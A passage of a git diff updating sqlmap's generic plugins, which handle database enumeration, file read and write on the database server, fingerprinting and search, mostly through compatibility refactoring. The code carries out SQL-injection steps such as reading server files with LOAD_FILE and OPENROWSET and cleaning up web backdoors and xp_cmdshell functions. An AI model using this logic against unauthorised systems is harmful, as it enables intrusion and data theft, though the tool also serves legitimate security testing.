[Y/n] " - if output and output[0].lower() != "y": + if not readInput(message, default='Y', boolean=True): return dumpFromDbs = [] @@ -441,17 +598,17 @@ def dumpFoundTables(self, tables): for db, tablesList in tables.items(): if tablesList: - message += "[%s]\n" % db + message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test.lower() == "a": - dumpFromDbs = tables.keys() - elif test.lower() == "q": + if not choice or choice.lower() == 'a': + dumpFromDbs = list(tables.keys()) + elif choice.lower() == 'q': return else: - dumpFromDbs = test.replace(" ", "").split(",") + dumpFromDbs = choice.replace(" ", "").split(',') for db, tablesList in tables.items(): if db not in dumpFromDbs or not tablesList: @@ -459,24 +616,24 @@ def dumpFoundTables(self, tables): conf.db = db dumpFromTbls = [] - message = "which table(s) of database '%s'?\n" % db + message = "which table(s) of database '%s'?\n" % unsafeSQLIdentificatorNaming(db) message += "[a]ll (default)\n" for tbl in tablesList: - message += "[%s]\n" % tbl + message += "[%s]\n" % unsafeSQLIdentificatorNaming(tbl) message += "[s]kip\n" message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test.lower() == "a": + if not choice or choice.lower() == 'a': dumpFromTbls = tablesList - elif test.lower() == "s": + elif choice.lower() == 's': continue - elif test.lower() == "q": + elif choice.lower() == 'q': return else: - dumpFromTbls = test.replace(" ", "").split(",") + dumpFromTbls = choice.replace(" ", "").split(',') for table in dumpFromTbls: conf.tbl = table diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py index a537dd469c6..a410816f6e2 100644 --- a/plugins/generic/enumeration.py +++ b/plugins/generic/enumeration.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py index 7ced5df0a40..df7fb110389 100644 --- a/plugins/generic/filesystem.py +++ b/plugins/generic/filesystem.py @@ -1,85 +1,103 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import codecs import os +import sys from lib.core.agent import agent -from lib.core.common import dataToOutFile from lib.core.common import Backend +from lib.core.common import checkFile +from lib.core.common import dataToOutFile from lib.core.common import decloakToTemp -from lib.core.common import decodeHexValue -from lib.core.common import isNumPosStrValue +from lib.core.common import decodeDbmsHexValue from lib.core.common import isListLike +from lib.core.common import isNoneValue +from lib.core.common import isNullValue +from lib.core.common import isNumPosStrValue +from lib.core.common import isStackingAvailable from lib.core.common import isTechniqueAvailable from lib.core.common import readInput +from lib.core.compat import xrange +from lib.core.convert import encodeBase64 +from lib.core.convert import encodeHex +from lib.core.convert import getText +from 
lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger -from lib.core.enums import DBMS from lib.core.enums import CHARSET_TYPE +from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapUndefinedMethod +from lib.core.settings import UNICODE_ENCODING from lib.request import inject -class Filesystem: +class Filesystem(object): """ This class defines generic OS file system functionalities for plugins. """ def __init__(self): - self.fileTblName = "sqlmapfile" + self.fileTblName = "%sfile" % conf.tablePrefix self.tblField = "data" def _checkFileLength(self, localFile, remoteFile, fileRead=False): if Backend.isDbms(DBMS.MYSQL): - lengthQuery = "SELECT LENGTH(LOAD_FILE('%s'))" % remoteFile + lengthQuery = "LENGTH(LOAD_FILE('%s'))" % remoteFile elif Backend.isDbms(DBMS.PGSQL) and not fileRead: - lengthQuery = "SELECT LENGTH(data) FROM pg_largeobject WHERE loid=%d" % self.oid + lengthQuery = "SELECT SUM(LENGTH(data)) FROM pg_largeobject WHERE loid=%d" % self.oid elif Backend.isDbms(DBMS.MSSQL): self.createSupportTbl(self.fileTblName, self.tblField, "VARBINARY(MAX)") - inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)); + inject.goStacked("INSERT INTO %s(%s) SELECT %s FROM OPENROWSET(BULK '%s', SINGLE_BLOB) AS %s(%s)" % (self.fileTblName, self.tblField, self.tblField, remoteFile, self.fileTblName, self.tblField)) lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName) - localFileSize = os.path.getsize(localFile) + try: + localFileSize = os.path.getsize(localFile) + except OSError: + warnMsg = "file '%s' is missing" % localFile + logger.warning(warnMsg) + localFileSize = 0 if fileRead and Backend.isDbms(DBMS.PGSQL): - logger.info("length of read file %s cannot be checked on PostgreSQL" % remoteFile) + logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile) sameFile = True else: - logger.debug("checking the length of the remote file %s" % remoteFile) + logger.debug("checking the length of the remote file '%s'" % remoteFile) remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) sameFile = None if isNumPosStrValue(remoteFileSize): - remoteFileSize = long(remoteFileSize) + remoteFileSize = int(remoteFileSize) + localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) sameFile = False if localFileSize == remoteFileSize: sameFile = True - infoMsg = "the local file %s and the remote file " % localFile - infoMsg += "%s have the same size" % remoteFile + infoMsg = "the local file '%s' and the remote file " % localFile + infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize) elif remoteFileSize > localFileSize: - infoMsg = "the remote file %s is larger than " % remoteFile - infoMsg += "the local file %s" % localFile + infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize) + infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize) else: - infoMsg = "the remote file %s is smaller than " % remoteFile - infoMsg += "file '%s' (%d bytes)" % (localFile, localFileSize) + infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize) + infoMsg += "file '%s' (%d B)" % (localFile, 
localFileSize) logger.info(infoMsg) else: sameFile = False - warnMsg = "it looks like the file has not been written, this " - warnMsg += "can occur if the DBMS process' user has no write " - warnMsg += "privileges in the destination path" - logger.warn(warnMsg) + warnMsg = "it looks like the file has not been written (usually " + warnMsg += "occurs if the DBMS process user has no write " + warnMsg += "privileges in the destination path)" + logger.warning(warnMsg) return sameFile @@ -103,20 +121,35 @@ def fileToSqlQueries(self, fcEncodedList): return sqlQueries - def fileEncode(self, fileName, encoding, single): + def fileEncode(self, fileName, encoding, single, chunkSize=256): """ Called by MySQL and PostgreSQL plugins to write a file on the back-end DBMS underlying file system """ - retVal = [] + checkFile(fileName) + with open(fileName, "rb") as f: - content = f.read().encode(encoding).replace("\n", "") + content = f.read() + + return self.fileContentEncode(content, encoding, single, chunkSize) + + def fileContentEncode(self, content, encoding, single, chunkSize=256): + retVal = [] + + if encoding == "hex": + content = encodeHex(content) + elif encoding == "base64": + content = encodeBase64(content) + else: + content = codecs.encode(content, encoding) + + content = getText(content).replace("\n", "") if not single: - if len(content) > 256: - for i in xrange(0, len(content), 256): - _ = content[i:i + 256] + if len(content) > chunkSize: + for i in xrange(0, len(content), chunkSize): + _ = content[i:i + chunkSize] if encoding == "hex": _ = "0x%s" % _ @@ -136,27 +169,27 @@ def fileEncode(self, fileName, encoding, single): return retVal def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False): - output = None + choice = None if forceCheck is not True: message = "do you want confirmation that the local file '%s' " % localFile message += "has been successfully written on the back-end DBMS " - message += "file system (%s)? [Y/n] " % remoteFile - output = readInput(message, default="Y") + message += "file system ('%s')? [Y/n] " % remoteFile + choice = readInput(message, default='Y', boolean=True) - if forceCheck or (output and output.lower() == "y"): + if forceCheck or choice: return self._checkFileLength(localFile, remoteFile) return True def askCheckReadFile(self, localFile, remoteFile): - message = "do you want confirmation that the remote file '%s' " % remoteFile - message += "has been successfully downloaded from the back-end " - message += "DBMS file system? [Y/n] " - output = readInput(message, default="Y") + if not kb.bruteMode: + message = "do you want confirmation that the remote file '%s' " % remoteFile + message += "has been successfully downloaded from the back-end " + message += "DBMS file system? 
[Y/n] " - if not output or output in ("y", "Y"): - return self._checkFileLength(localFile, remoteFile, True) + if readInput(message, default='Y', boolean=True): + return self._checkFileLength(localFile, remoteFile, True) return None @@ -170,34 +203,34 @@ def stackedReadFile(self, remoteFile): errMsg += "into the specific DBMS plugin" raise SqlmapUndefinedMethod(errMsg) - def unionWriteFile(self, localFile, remoteFile, fileType): + def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): errMsg = "'unionWriteFile' method must be defined " errMsg += "into the specific DBMS plugin" raise SqlmapUndefinedMethod(errMsg) - def stackedWriteFile(self, localFile, remoteFile, fileType): + def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): errMsg = "'stackedWriteFile' method must be defined " errMsg += "into the specific DBMS plugin" raise SqlmapUndefinedMethod(errMsg) - def readFile(self, remoteFiles): + def readFile(self, remoteFile): localFilePaths = [] self.checkDbmsOs() - for remoteFile in remoteFiles.split(","): + for remoteFile in remoteFile.split(','): fileContent = None kb.fileReadMode = True - if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): - debugMsg = "going to read the file with stacked query SQL " + if conf.direct or isStackingAvailable(): + if isStackingAvailable(): + debugMsg = "going to try to read the file with stacked query SQL " debugMsg += "injection technique" logger.debug(debugMsg) fileContent = self.stackedReadFile(remoteFile) elif Backend.isDbms(DBMS.MYSQL): - debugMsg = "going to read the file with a non-stacked query " + debugMsg = "going to try to read the file with non-stacked query " debugMsg += "SQL injection technique" logger.debug(debugMsg) @@ -212,8 +245,9 @@ def readFile(self, remoteFiles): kb.fileReadMode = False - if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL): + if (isNoneValue(fileContent) or isNullValue(fileContent)) and not Backend.isDbms(DBMS.PGSQL): self.cleanup(onlyFileTbl=True) + fileContent = None elif isListLike(fileContent): newFileContent = "" @@ -230,9 +264,9 @@ def readFile(self, remoteFiles): fileContent = newFileContent if fileContent is not None: - fileContent = decodeHexValue(fileContent) + fileContent = decodeDbmsHexValue(fileContent, True) - if fileContent: + if fileContent.strip(): localFilePath = dataToOutFile(remoteFile, fileContent) if not Backend.isDbms(DBMS.PGSQL): @@ -246,7 +280,7 @@ def readFile(self, remoteFiles): localFilePath += " (size differs from remote file)" localFilePaths.append(localFilePath) - else: + elif not kb.bruteMode: errMsg = "no data retrieved" logger.error(errMsg) @@ -255,25 +289,33 @@ def readFile(self, remoteFiles): def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): written = False + checkFile(localFile) + self.checkDbmsOs() if localFile.endswith('_'): - localFile = decloakToTemp(localFile) + localFile = getUnicode(decloakToTemp(localFile)) - if conf.direct or isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): - if isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED): - debugMsg = "going to upload the %s file with " % fileType - debugMsg += "stacked query SQL injection technique" + if conf.direct or isStackingAvailable(): + if isStackingAvailable(): + debugMsg = "going to upload the file '%s' with " % fileType + debugMsg += "stacked query technique" logger.debug(debugMsg) written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) 
self.cleanup(onlyFileTbl=True) elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL): - debugMsg = "going to upload the %s file with " % fileType - debugMsg += "UNION query SQL injection technique" + debugMsg = "going to upload the file '%s' with " % fileType + debugMsg += "UNION query technique" logger.debug(debugMsg) written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck) + elif Backend.isDbms(DBMS.MYSQL): + debugMsg = "going to upload the file '%s' with " % fileType + debugMsg += "LINES TERMINATED BY technique" + logger.debug(debugMsg) + + written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck) else: errMsg = "none of the SQL injection techniques detected can " errMsg += "be used to write files to the underlying file " diff --git a/plugins/generic/fingerprint.py b/plugins/generic/fingerprint.py index 8bddb41f975..38f4775a1b9 100644 --- a/plugins/generic/fingerprint.py +++ b/plugins/generic/fingerprint.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.common import Backend @@ -11,7 +11,7 @@ from lib.core.enums import OS from lib.core.exception import SqlmapUndefinedMethod -class Fingerprint: +class Fingerprint(object): """ This class defines generic fingerprint functionalities for plugins. """ @@ -40,19 +40,19 @@ def forceDbmsEnum(self): def userChooseDbmsOs(self): warnMsg = "for some reason sqlmap was unable to fingerprint " warnMsg += "the back-end DBMS operating system" - logger.warn(warnMsg) + logger.warning(warnMsg) msg = "do you want to provide the OS? [(W)indows/(l)inux]" while True: - os = readInput(msg, default="W") + os = readInput(msg, default='W').upper() - if os[0].lower() == "w": + if os == 'W': Backend.setOs(OS.WINDOWS) break - elif os[0].lower() == "l": + elif os == 'L': Backend.setOs(OS.LINUX) break else: warnMsg = "invalid value" - logger.warn(warnMsg) + logger.warning(warnMsg) diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py index 9ab4adb7d75..bbb7adc0935 100644 --- a/plugins/generic/misc.py +++ b/plugins/generic/misc.py @@ -1,19 +1,21 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import ntpath import re from lib.core.common import Backend from lib.core.common import hashDBWrite -from lib.core.common import isTechniqueAvailable +from lib.core.common import isStackingAvailable from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import posixToNtSlashes from lib.core.common import readInput +from lib.core.common import singleTimeDebugMessage from lib.core.common import unArrayizeValue from lib.core.data import conf from lib.core.data import kb @@ -22,12 +24,10 @@ from lib.core.enums import DBMS from lib.core.enums import HASHDB_KEYS from lib.core.enums import OS -from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapUnsupportedFeatureException from lib.request import inject -class Miscellaneous: +class Miscellaneous(object): """ This class defines miscellaneous functionalities for plugins. 
""" @@ -36,6 +36,17 @@ def __init__(self): pass def getRemoteTempPath(self): + if not conf.tmpPath and Backend.isDbms(DBMS.MSSQL): + debugMsg = "identifying Microsoft SQL Server error log directory " + debugMsg += "that sqlmap will use to store temporary files with " + debugMsg += "commands' output" + logger.debug(debugMsg) + + _ = unArrayizeValue(inject.getValue("SELECT SERVERPROPERTY('ErrorLogFileName')", safeCharEncode=False)) + + if _: + conf.tmpPath = ntpath.dirname(_) + if not conf.tmpPath: if Backend.isOs(OS.WINDOWS): if conf.direct: @@ -58,6 +69,8 @@ def getRemoteTempPath(self): conf.tmpPath = normalizePath(conf.tmpPath) conf.tmpPath = ntToPosixSlashes(conf.tmpPath) + singleTimeDebugMessage("going to use '%s' as temporary files directory" % conf.tmpPath) + hashDBWrite(HASHDB_KEYS.CONF_TMP_PATH, conf.tmpPath) return conf.tmpPath @@ -69,25 +82,16 @@ def getVersionFromBanner(self): infoMsg = "detecting back-end DBMS version from its banner" logger.info(infoMsg) - if Backend.isDbms(DBMS.MYSQL): - first, last = 1, 6 - - elif Backend.isDbms(DBMS.PGSQL): - first, last = 12, 6 - - elif Backend.isDbms(DBMS.MSSQL): - first, last = 29, 9 - - else: - raise SqlmapUnsupportedFeatureException("unsupported DBMS") - - query = queries[Backend.getIdentifiedDbms()].substring.query % (queries[Backend.getIdentifiedDbms()].banner.query, first, last) + query = queries[Backend.getIdentifiedDbms()].banner.query if conf.direct: query = "SELECT %s" % query - kb.bannerFp["dbmsVersion"] = unArrayizeValue(inject.getValue(query)) - kb.bannerFp["dbmsVersion"] = (kb.bannerFp["dbmsVersion"] or "").replace(",", "").replace("-", "").replace(" ", "") + kb.bannerFp["dbmsVersion"] = unArrayizeValue(inject.getValue(query)) or "" + + match = re.search(r"\d[\d.-]*", kb.bannerFp["dbmsVersion"]) + if match: + kb.bannerFp["dbmsVersion"] = match.group(0) def delRemoteFile(self, filename): if not filename: @@ -105,7 +109,11 @@ def delRemoteFile(self, filename): def createSupportTbl(self, tblName, tblField, tblType): inject.goStacked("DROP TABLE %s" % tblName, silent=True) - inject.goStacked("CREATE TABLE %s(%s %s)" % (tblName, tblField, tblType)) + + if Backend.isDbms(DBMS.MSSQL) and tblName == self.cmdTblName: + inject.goStacked("CREATE TABLE %s(id INT PRIMARY KEY IDENTITY, %s %s)" % (tblName, tblField, tblType)) + else: + inject.goStacked("CREATE TABLE %s(%s %s)" % (tblName, tblField, tblType)) def cleanup(self, onlyFileTbl=False, udfDict=None, web=False): """ @@ -119,7 +127,10 @@ def cleanup(self, onlyFileTbl=False, udfDict=None, web=False): self.delRemoteFile(self.webStagerFilePath) self.delRemoteFile(self.webBackdoorFilePath) - if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: + if (not isStackingAvailable() or kb.udfFail) and not conf.direct: + return + + if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and kb.copyExecTest: return if Backend.isOs(OS.WINDOWS): @@ -144,16 +155,15 @@ def cleanup(self, onlyFileTbl=False, udfDict=None, web=False): inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True) if Backend.isDbms(DBMS.MSSQL): - return + udfDict = {"master..new_xp_cmdshell": {}} if udfDict is None: - udfDict = self.sysUdfs + udfDict = getattr(self, "sysUdfs", {}) for udf, inpRet in udfDict.items(): message = "do you want to remove UDF '%s'? 
[Y/n] " % udf - output = readInput(message, default="Y") - if not output or output in ("y", "Y"): + if readInput(message, default='Y', boolean=True): dropStr = "DROP FUNCTION %s" % udf if Backend.isDbms(DBMS.PGSQL): @@ -173,7 +183,7 @@ def cleanup(self, onlyFileTbl=False, udfDict=None, web=False): warnMsg += "saved on the file system can only be deleted " warnMsg += "manually" - logger.warn(warnMsg) + logger.warning(warnMsg) def likeOrExact(self, what): message = "do you want sqlmap to consider provided %s(s):\n" % what diff --git a/plugins/generic/search.py b/plugins/generic/search.py index 49570747901..5ec72f18ff2 100644 --- a/plugins/generic/search.py +++ b/plugins/generic/search.py @@ -1,10 +1,12 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import re + from lib.core.agent import agent from lib.core.common import arrayizeValue from lib.core.common import Backend @@ -16,6 +18,7 @@ from lib.core.common import isTechniqueAvailable from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import safeStringFormat from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf @@ -31,11 +34,13 @@ from lib.core.exception import SqlmapUserQuitException from lib.core.settings import CURRENT_DB from lib.core.settings import METADB_SUFFIX +from lib.core.settings import UPPER_CASE_DBMSES from lib.request import inject -from lib.techniques.brute.use import columnExists -from lib.techniques.brute.use import tableExists +from lib.utils.brute import columnExists +from lib.utils.brute import tableExists +from thirdparty import six -class Search: +class Search(object): """ This class defines search functionalities for plugins. """ @@ -46,7 +51,7 @@ def __init__(self): def searchDb(self): foundDbs = [] rootQuery = queries[Backend.getIdentifiedDbms()].search_db - dbList = conf.db.split(",") + dbList = conf.db.split(',') if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: dbCond = rootQuery.inband.condition2 @@ -59,12 +64,12 @@ def searchDb(self): values = [] db = safeSQLIdentificatorNaming(db) - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: db = db.upper() infoMsg = "searching database" if dbConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) @@ -97,7 +102,7 @@ def searchDb(self): if not values and isInferenceAvailable() and not conf.direct: infoMsg = "fetching number of database" if dbConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) @@ -112,9 +117,9 @@ def searchDb(self): if not isNumPosStrValue(count): warnMsg = "no database" if dbConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' found" % unsafeSQLIdentificatorNaming(db) - logger.warn(warnMsg) + logger.warning(warnMsg) continue @@ -144,19 +149,19 @@ def searchTable(self): bruteForce = True if bruteForce: - message = "do you want to use common table existence check? 
%s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + message = "do you want to use common table existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB) else "[y/N/q]") + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: - regex = "|".join(conf.tbl.split(",")) + regex = '|'.join(conf.tbl.split(',')) return tableExists(paths.COMMON_TABLES, regex) foundTbls = {} - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') rootQuery = queries[Backend.getIdentifiedDbms()].search_table tblCond = rootQuery.inband.condition dbCond = rootQuery.inband.condition2 @@ -166,29 +171,36 @@ def searchTable(self): values = [] tbl = safeSQLIdentificatorNaming(tbl, True) - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: tbl = tbl.upper() + conf.db = conf.db.upper() if conf.db else conf.db infoMsg = "searching table" - if tblConsider == "1": - infoMsg += "s like" + if tblConsider == '1': + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - if dbCond and conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if dbCond and conf.db: + _ = conf.db.split(',') whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")" infoMsg += " for database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) elif conf.excludeSysDbs: whereDbsQuery = "".join(" AND '%s' != %s" % (unsafeSQLIdentificatorNaming(db), dbCond) for db in self.excludeDbsList) - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg2) + msg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) + logger.info(msg) else: whereDbsQuery = "" + if dbCond and conf.exclude: + whereDbsQuery += " AND %s NOT LIKE '%s'" % (dbCond, re.sub(r"\.[*+]", '%', conf.exclude._original)) + logger.info(infoMsg) tblQuery = "%s%s" % (tblCond, tblCondParam) - tblQuery = tblQuery % tbl + tblQuery = tblQuery % unsafeSQLIdentificatorNaming(tbl) if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: query = rootQuery.inband.query @@ -199,7 +211,7 @@ def searchTable(self): if values and Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): newValues = [] - if isinstance(values, basestring): + if isinstance(values, six.string_types): values = [values] for value in values: dbName = "SQLite" if Backend.isDbms(DBMS.SQLITE) else "Firebird" @@ -224,7 +236,7 @@ def searchTable(self): if len(whereDbsQuery) == 0: infoMsg = "fetching number of databases with table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.info(infoMsg) @@ -235,9 +247,9 @@ def searchTable(self): if not isNumPosStrValue(count): warnMsg = "no databases have table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - logger.warn(warnMsg) + 
logger.warning(warnMsg) continue @@ -260,20 +272,21 @@ def searchTable(self): if tblConsider == "2": continue else: - for db in conf.db.split(","): + for db in conf.db.split(',') if conf.db else (self.getCurrentDb(),): + db = safeSQLIdentificatorNaming(db) if db not in foundTbls: foundTbls[db] = [] else: dbName = "SQLite" if Backend.isDbms(DBMS.SQLITE) else "Firebird" foundTbls["%s%s" % (dbName, METADB_SUFFIX)] = [] - for db in foundTbls.keys(): + for db in foundTbls: db = safeSQLIdentificatorNaming(db) infoMsg = "fetching number of table" if tblConsider == "1": - infoMsg += "s like" - infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), db) + infoMsg += "s LIKE" + infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) query = rootQuery.blind.count2 @@ -286,10 +299,10 @@ def searchTable(self): if not isNumPosStrValue(count): warnMsg = "no table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) - warnMsg += "in database '%s'" % db - logger.warn(warnMsg) + warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) + logger.warning(warnMsg) continue @@ -298,25 +311,35 @@ def searchTable(self): for index in indexRange: query = rootQuery.blind.query2 + if " ORDER BY " in query: + query = query.replace(" ORDER BY ", "%s ORDER BY " % (" AND %s" % tblQuery)) + elif query.endswith("'%s')"): + query = query[:-1] + " AND %s)" % tblQuery + else: + query += " AND %s" % tblQuery + if Backend.isDbms(DBMS.FIREBIRD): - query = query % index + query = safeStringFormat(query, index) if Backend.getIdentifiedDbms() not in (DBMS.SQLITE, DBMS.FIREBIRD): - query = query % unsafeSQLIdentificatorNaming(db) - - query += " AND %s" % tblQuery + query = safeStringFormat(query, unsafeSQLIdentificatorNaming(db)) if not Backend.isDbms(DBMS.FIREBIRD): query = agent.limitQuery(index, query) foundTbl = unArrayizeValue(inject.getValue(query, union=False, error=False)) - kb.hintValue = foundTbl - foundTbl = safeSQLIdentificatorNaming(foundTbl, True) - foundTbls[db].append(foundTbl) + if not isNoneValue(foundTbl): + kb.hintValue = foundTbl + foundTbl = safeSQLIdentificatorNaming(foundTbl, True) + foundTbls[db].append(foundTbl) + + for db in list(foundTbls.keys()): + if isNoneValue(foundTbls[db]): + del foundTbls[db] if not foundTbls: warnMsg = "no databases contain any of the provided tables" - logger.warn(warnMsg) + logger.warning(warnMsg) return conf.dumper.dbTables(foundTbls) @@ -325,27 +348,28 @@ def searchTable(self): def searchColumn(self): bruteForce = False + self.forceDbmsEnum() + if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: errMsg = "information_schema not available, " errMsg += "back-end DBMS is MySQL < 5.0" bruteForce = True if bruteForce: - message = "do you want to use common column existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + message = "do you want to use common column existence check? 
%s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB) else "[y/N/q]") + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: - regex = "|".join(conf.col.split(",")) + regex = '|'.join(conf.col.split(',')) conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS, regex)) message = "do you want to dump entries? [Y/n] " - output = readInput(message, default="Y") - if output and output[0] not in ("n", "N"): + if readInput(message, default='Y', boolean=True): self.dumpAll() return @@ -357,7 +381,11 @@ def searchColumn(self): whereTblsQuery = "" infoMsgTbl = "" infoMsgDb = "" - colList = conf.col.split(",") + colList = conf.col.split(',') + + if conf.exclude: + colList = [_ for _ in colList if re.search(conf.exclude, _, re.I) is None] + origTbl = conf.tbl origDb = conf.db colCond = rootQuery.inband.condition @@ -371,31 +399,43 @@ def searchColumn(self): conf.db = origDb conf.tbl = origTbl - if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: column = column.upper() + conf.db = conf.db.upper() if conf.db else conf.db + conf.tbl = conf.tbl.upper() if conf.tbl else conf.tbl infoMsg = "searching column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) foundCols[column] = {} - if conf.tbl: - _ = conf.tbl.split(",") - whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")" - infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(tbl for tbl in _)) + if tblCond: + if conf.tbl: + tbls = 